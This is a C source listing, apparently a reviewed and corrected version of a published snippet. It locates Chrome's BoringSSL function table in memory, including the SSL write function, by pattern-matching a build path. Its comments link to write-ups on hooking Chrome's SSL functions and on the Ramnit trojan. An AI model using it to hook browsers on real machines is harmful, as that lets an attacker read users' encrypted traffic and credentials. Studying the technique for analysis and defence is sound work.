https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/ http://www.rohitab.com/discuss/topic/41729-google-chrome-ssl-write-hook-openssl/ https://www.emanueledelucia.net/the-ramnit-web-browser-specialist-hooker-number-ii/ The byte array in the listing below decodes to the build path: c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c
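/*
 * Function-pointer table that the scanner below expects to find at a fixed
 * distance before the embedded "ssl_lib.c" build path in a module's .rdata.
 * This is the layout the write-ups linked above describe for one particular
 * Chrome/BoringSSL build; it is not a public API.  The member sizes (and
 * therefore the table's total size) depend on the pointer width, so the
 * layout presumably only matches the 32-bit build the listing targets.
 *
 * NOTE(review): the tag _SSLMETHODS starts with underscore+uppercase, which
 * C reserves for the implementation; it is kept unchanged so existing
 * `struct _SSLMETHODS` references still compile.
 */
typedef struct _SSLMETHODS {
    int version;
    int (*ssl3_new)(void *s);
    int (*ssl3_clear)(void *s);
    void (*ssl3_free)(void *s);
    int (*ssl3_accept)(void *s);
    int (*ssl3_connect)(void *s);
    int (*ssl3_read)(void *s, void *buf, int len);
    int (*ssl3_peek)(void *s, void *buf, int len);
    int (*ssl3_write)(void *s, const void *buf, int len);
    int (*ssl3_shutdown)(void *s);
} SSLMETHODS, *PSSLMETHODS;

/*
 * Distance in bytes from the start of the matched path string back to the
 * method table.  Build-specific value taken verbatim from the original
 * listing; nothing in the PE image validates it, so it will silently point
 * at unrelated data in any other build.
 */
#define SSLMETHODS_STRING_TO_TABLE_OFFSET 0x64

/* IMAGE_SECTION_HEADER.Name is an 8-byte field with no NUL terminator when
 * all eight bytes are used, so it must never be read with strcmp(). */
#define PE_SECTION_NAME_LEN 8

/*
 * Locate the SSL method table in an already-loaded module by scanning its
 * .rdata section for the embedded BoringSSL build path (see the decoded
 * string above the listing) and applying the fixed offset.
 *
 * szModule: module name handed to GetModuleHandleA (NULL = main executable).
 *
 * Returns the table address on the first match, or NULL when the module is
 * not loaded, its DOS/NT headers are not valid, it has no .rdata section, or
 * the path string is not present.  The result is a raw pointer into the
 * module image; nothing about it is validated beyond the string match.
 *
 * Defects fixed relative to the original listing:
 *  - the scan is bounded so memcmp() never reads past the end of the
 *    section (the original compared sizeof(ucString) bytes at every offset
 *    below SizeOfRawData, overrunning the section by up to
 *    sizeof(ucString)-1 bytes on a miss);
 *  - the mapped extent (Misc.VirtualSize) is scanned instead of the on-disk
 *    raw size, since the module is mapped in memory, not read from a file;
 *  - the section name is compared with a length-bounded strncmp();
 *  - addresses are carried as unsigned char* instead of DWORD, which
 *    truncates pointers in a 64-bit process;
 *  - the loop counter is unsigned, avoiding the signed/unsigned comparison
 *    against NumberOfSections / VirtualSize.
 */
PSSLMETHODS FindSSLWrite(char *szModule)
{
    /* "c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c"
     * plus its terminating NUL, kept as raw bytes exactly as in the listing.
     * The NUL is part of the pattern, so a match is anchored at the string end. */
    static const unsigned char ucString[] = {
        0x63, 0x3a, 0x5c,                                           /* c:\            */
        0x62, 0x5c,                                                 /* b\             */
        0x62, 0x75, 0x69, 0x6c, 0x64, 0x5c,                         /* build\         */
        0x73, 0x6c, 0x61, 0x76, 0x65, 0x5c,                         /* slave\         */
        0x77, 0x69, 0x6e, 0x5c,                                     /* win\           */
        0x62, 0x75, 0x69, 0x6c, 0x64, 0x5c,                         /* build\         */
        0x73, 0x72, 0x63, 0x5c,                                     /* src\           */
        0x74, 0x68, 0x69, 0x72, 0x64, 0x5f, 0x70, 0x61, 0x72, 0x74, 0x79, 0x5c, /* third_party\ */
        0x62, 0x6f, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x73, 0x6c, 0x5c, /* boringssl\     */
        0x73, 0x72, 0x63, 0x5c,                                     /* src\           */
        0x73, 0x73, 0x6c, 0x5c,                                     /* ssl\           */
        0x73, 0x73, 0x6c, 0x5f, 0x6c, 0x69, 0x62, 0x2e, 0x63,       /* ssl_lib.c      */
        0x00
    };

    HMODULE hModule = GetModuleHandleA(szModule);
    if (!hModule) {
        return NULL;
    }

    /* Byte pointer for all image arithmetic: no truncation on 64-bit. */
    unsigned char *base = (unsigned char *)hModule;

    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)base;
    if (pDos->e_magic != IMAGE_DOS_SIGNATURE) {
        return NULL;
    }
    PIMAGE_NT_HEADERS pNT = (PIMAGE_NT_HEADERS)(base + pDos->e_lfanew);
    if (pNT->Signature != IMAGE_NT_SIGNATURE) {
        return NULL;
    }

    /* The section table directly follows the NT headers; this keeps the
     * original's assumption that the optional header has its default size. */
    PIMAGE_SECTION_HEADER pSection =
        (PIMAGE_SECTION_HEADER)((unsigned char *)pNT + sizeof(IMAGE_NT_HEADERS));

    for (unsigned i = 0; i < pNT->FileHeader.NumberOfSections; i++, pSection++) {
        if (strncmp((const char *)pSection->Name, ".rdata", PE_SECTION_NAME_LEN) != 0) {
            continue;
        }

        /* Scan only the bytes actually mapped for this section. */
        unsigned char *scan = base + pSection->VirtualAddress;
        size_t extent = pSection->Misc.VirtualSize;
        if (extent < sizeof ucString) {
            continue; /* too small to hold the pattern at all */
        }

        /* off + sizeof ucString <= extent keeps every memcmp() inside the section. */
        for (size_t off = 0; off + sizeof ucString <= extent; off++) {
            if (memcmp(scan + off, ucString, sizeof ucString) == 0) {
                return (PSSLMETHODS)(scan + off - SSLMETHODS_STRING_TO_TABLE_OFFSET);
            }
        }
    }

    return NULL;
}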